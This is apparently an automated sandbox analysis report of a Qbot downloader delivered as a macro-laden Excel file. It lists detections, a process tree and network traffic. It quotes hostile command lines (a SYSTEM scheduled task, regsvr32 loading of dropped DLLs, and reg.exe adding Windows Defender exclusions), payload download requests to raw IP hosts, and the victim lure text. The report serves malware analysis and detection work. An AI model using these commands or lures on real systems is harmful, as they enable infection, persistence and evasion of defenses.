Play interactive tour

Edit tour

Windows Analysis Report #Qbot downloader

Overview

General Information

Sample Name:	#Qbot downloader (renamed file extension from none to xls)
Analysis ID:	491755
MD5:	b4b3a2223765ac84c9b1b05dbf7c6503
SHA1:	57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
SHA256:	3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
Tags:	downloaderQbotxlsx
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Qbot

Document exploit detected (drops PE files)

Sigma detected: Schedule system process

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Office process drops PE file

Writes to foreign memory regions

Uses cmd line tools excessively to alter registry or file data

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory in foreign processes

Injects code into the Windows Explorer (explorer.exe)

PE file has nameless sections

Sigma detected: Regsvr32 Command Line Without DLL

Machine Learning detection for dropped file

Drops PE files to the user root directory

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Yara detected hidden Macro 4.0 in Excel

Uses schtasks.exe or at.exe to add and modify task schedules

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Drops files with a non-matching file extension (content does not match file extension)

PE file does not import any functions

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Uses reg.exe to modify the Windows registry

Document contains embedded VBA macros

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2812 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 2516 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2852 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 1172 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

schtasks.exe (PID: 2556 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

regsvr32.exe (PID: 2968 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2528 cmdline: -silent ..\Drezd1.red MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 236 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

regsvr32.exe (PID: 804 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 672 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 1500 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 1308 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

reg.exe (PID: 1684 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Krngnamoimcp' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

reg.exe (PID: 536 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Waizacawzvcu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

regsvr32.exe (PID: 2072 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2312 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
#Qbot downloader.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.819617621.0000000000080000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000D.00000002.559785788.0000000000270000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000009.00000002.551759186.0000000000190000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000005.00000002.543038317.0000000000440000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.regsvr32.exe.190000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
15.2.explorer.exe.80000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
13.2.regsvr32.exe.270000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
13.2.regsvr32.exe.270000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
5.2.regsvr32.exe.10000000.8.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
11.2.explorer.exe.80000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
15.2.explorer.exe.80000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
6.2.explorer.exe.80000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
9.2.regsvr32.exe.190000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
6.2.explorer.exe.80000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
5.2.regsvr32.exe.440000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
11.2.explorer.exe.80000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
13.2.regsvr32.exe.10000000.8.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
5.2.regsvr32.exe.440000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
9.2.regsvr32.exe.10000000.8.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 10 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2812, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 2516

Sigma detected: Regsvr32 Command Line Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2516, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 2852

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 1172, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35, ProcessId: 2556

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[2].dat	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[1].dat	Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.545232127.00000000027C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000003.555252699.0000000002741000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,	5_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_0008AEB4 FindFirstFileW,FindNextFileW,	6_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_1000AEB4 FindFirstFileW,FindNextFileW,	9_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0008AEB4 FindFirstFileW,FindNextFileW,	11_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,	13_2_1000AEB4

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 44466.8890891204[1].dat.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 19:19:31 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.8890891204.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 19:19:49 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.8890891204.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /44466.8890891204.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /44466.8890891204.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178

Source: regsvr32.exe, 00000005.00000002.543565001.00000000021A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.819876628.0000000000960000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.552496704.00000000022B0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000002.555876027.0000000000A00000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000004.00000002.546532778.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.543183246.0000000001EA0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.555836573.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.552039432.0000000001E10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.562885480.0000000000940000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.560052326.0000000000920000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000005.00000002.543565001.00000000021A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.819876628.0000000000960000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.552496704.00000000022B0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000002.555876027.0000000000A00000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[1].dat

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /44466.8890891204.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /44466.8890891204.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
Source: Screenshot number: 4	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4	Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Source: Document image extraction number: 0	Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1	Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[1].dat	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[2].dat	Jump to dropped file

PE file has nameless sections

Show sources

Source: 44466.8890891204[1].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[1].dat.0.dr	Static PE information: section name:
Source: 44466.8890891204[1].dat.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
